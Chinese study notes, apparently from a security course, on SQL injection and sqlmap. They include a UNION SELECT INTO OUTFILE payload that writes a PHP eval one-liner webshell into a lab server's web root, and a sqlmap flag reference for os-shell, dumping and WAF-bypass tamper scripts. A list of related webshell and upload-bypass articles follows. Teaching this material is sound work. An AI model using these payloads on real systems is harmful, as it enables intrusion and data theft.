第十周笔记—SQLmap和sql注入上传木马

目录

SQL注入

上传木马

前提:

  • 要知道网站的绝对路径
  • 具有写入权限
select 'hello world' into outfile 'c:/abcdef.txt'   --路径的斜杠用 /或者\\
--把hello world写入文件中 实战攻击语句:
select * from boy where hid='' union select 11,'hello world'into outfile
'C:/111.txt'; select user()
--查询当前用户名 http://192.168.99.171/test2/sqli/example10.php?catid='3
' union select '<?php @eval($_POST[996])?>',2,3,4
into outfile 'C:/xampp/htdocs/test2/zxh2.php' --+' --后两行为sql注入语句,写入一句话木马

用菜刀连接,网址为木马的路径(不是绝对路径)
一句话木马:<?php @eval($_POST[996])?> --密码为996
用order by(排序)语句试出有多少列

PHP学习网站:
phpstudy

SQLmap

六大模块

  • 输入
  • 输出
  • 发送数据
  • 接受数据
  • 注入点检测
  • 真正攻击模块

命令

sqlmap.py

参数

-r          //读取文件

-u          //读取网址

-v 3        //查看sql注入的命令

-flush     //清除缓存

--is-dba    //是否为dba

--os-shell  //获取系统shell

--dbs       //查看所有数据库,命令用完即删

--threads   //线程数

--current-db    //查看当前网站用的库,命令用完即删

-D "[库名]"    //使用指定库

-T "[表名]"  //使用指定表

--count         //查找有几列,命令用完即删

--colums       //查找列名,显示列名和他的类型

-C "[列名]"    //使用指定列名,可以用逗号隔开

--dump         //把指定列名dump下来,慎用,金融网站犯法

--start 1       //从第一条dump到第二条(不是从0开始取)
--stop 2

三种请求方式

参见图片

取得系统shell

自动上传木马
用x或者q退出,否则会留下木马

原理:传上去一个具有远程命令执行漏洞的页面

条件

  1. 绝对路径
  2. dba超级管理员

命令参数:

--os-shell

--web-root="[绝对路径]"     //需要上传木马的目录

sqlmap高级注入

--identify-waf      //自动测试waf防火墙

--tamper [tamper脚本名称]       //手工指定混码脚本绕过,混码:空白符用%20或者%09代替,
//脚本在sqlmap/tamper文件下,多个脚本用逗号隔开

sql上传木马的更多相关文章

  1. weblogic上传木马路径选择

    对于反序列化漏洞,如果获得的是系统权限或者root权限,那就没必要上传木马,但如果只是web安装应用的权限,就上传获取更大权限. 上传需要找到几个点,获取物理路径,如下面三种: 方法1:把shell写 ...

  2. 绕过图片格式限制上传木马获取WebShell

    思路: 图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php 可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的resp ...

  3. WEB安全:文件上传漏洞

    文件上传漏洞过程 用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力. 一般的情况有: 上传文件WEB脚本语言,服务器的WEB容器解释并执行了用户上传的脚本,导致代码执行: ...

  4. DVWA-全等级文件上传

    DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法 ...

  5. WinsockExpert+NC抓包上传之拿WEBSHELL

    知识补充: nc上传漏洞在原理上同动网上传漏洞一样,都是利用计算机在读取字符串时,遇到'\0'(00)时,认为字符串结束了,从而丢掉后面的字符串,正如unicode编码特性一样,可被人利用,尽管在这里 ...

  6. JAE京东云引擎Git上传管理代码教程和京东云数据库导入导出管理

    文章目录 Git管理准备工作 Git工具上传代码 发布代码装程序 mywebsql管理 京东云引擎小结   JAE京东云引擎是京东推出的支持Java.Ruby.Python.PHP.Node.js多语 ...

  7. Kali学习笔记38:文件上传漏洞

    早些年,提到Web渗透,或者搜索一些黑客教程 基本都会看到文件上传漏洞. 它是一个很经典的漏洞 但它本质其实不是一个漏洞,而是网站本身的上传文件功能 不过如果我们上传了Webshell,那么就成为了文 ...

  8. 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞分析

      0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...

  9. 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞

    0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/ ...

随机推荐

  1. 3017C语言_文件

    第七章  文件 7.1  C语言文件的概念 7.1.1 文件的概念 在此之前,所有的输入和输出只涉及到键盘和显示器.在运行C程序时,我们通过键盘输入数据并借助显示器把程序的运算结果显示出来.但是,计算 ...

  2. 留存: struts2+jquery+json集成

    原文地址:struts2+jquery+json集成 以下采用struts2+jquery+json模拟一个案例.当点击提交按钮时会把输入的数据提交到后台,然后从后台获取数据在客户端显示. 效果如下: ...

  3. 系列教程 - java web开发

    代码之间工作室持续推出Java Web开发系列教程与案例,供广大朋友分享交流技术经验,帮助喜欢java的朋友们学习进步: java web 开发教程(1) - 开发环境搭建 技术交流QQ群: 商务合作 ...

  4. niaobulashi-一个基于springboot shrio的权限管理系统

    github项目地址:https://github.com/niaobulashi/niaobulashi springboot学习地址:http://www.ityouknow.com/spring ...

  5. zabbix-3.2.6安装部署

    一.准备一台虚拟机并安装centos7.x版本系统 二.配置zabbix_server 1.http install: #安装各类软件支持库 yum install apr-devel apr-uti ...

  6. Spring-Boot + MyBatis-Plus 踩坑记录

    这两天在学SpringBoot+MyBatis的开发,配置开发环境和DEMO的过程中踩了很多坑,在这里记录一下. 我的开发环境是idea + JDK 1.8.0.211. 首先展示一下demo的项目整 ...

  7. Linux系统下解锁Oracle的Scott用户

    1).在Oracle用户下面输入命令:lsnrctl status查看监听是否开启,如果未开启则需要开启监听,输入命令:lsnrctl start; 2).如果没有设置监听的话需要先建立一个监听,然后 ...

  8. Ember报错

    错误是ember-data的版本不对 解决办法是: npm install --save ember-data@2.14.2 //bing.com中去查资料,应有尽有

  9. What?一个 Dubbo 服务启动要两个小时!

    前言 前几天在测试环境碰到一个非常奇怪的与 dubbo 相关的问题,事后我在网上搜索了一圈并没有发现类似的帖子或文章,于是便有了这篇. 希望对还未碰到或正在碰到的朋友有所帮助. 现象 现象是这样的,有 ...

  10. C语言类型转换

    int/float to string/array: C语言提供了几个标准库函数,可以将任意类型(整型.长整型.浮点型等)的数字转换为字符串,下面列举了各函数的方法及其说明. itoa():将整型值转 ...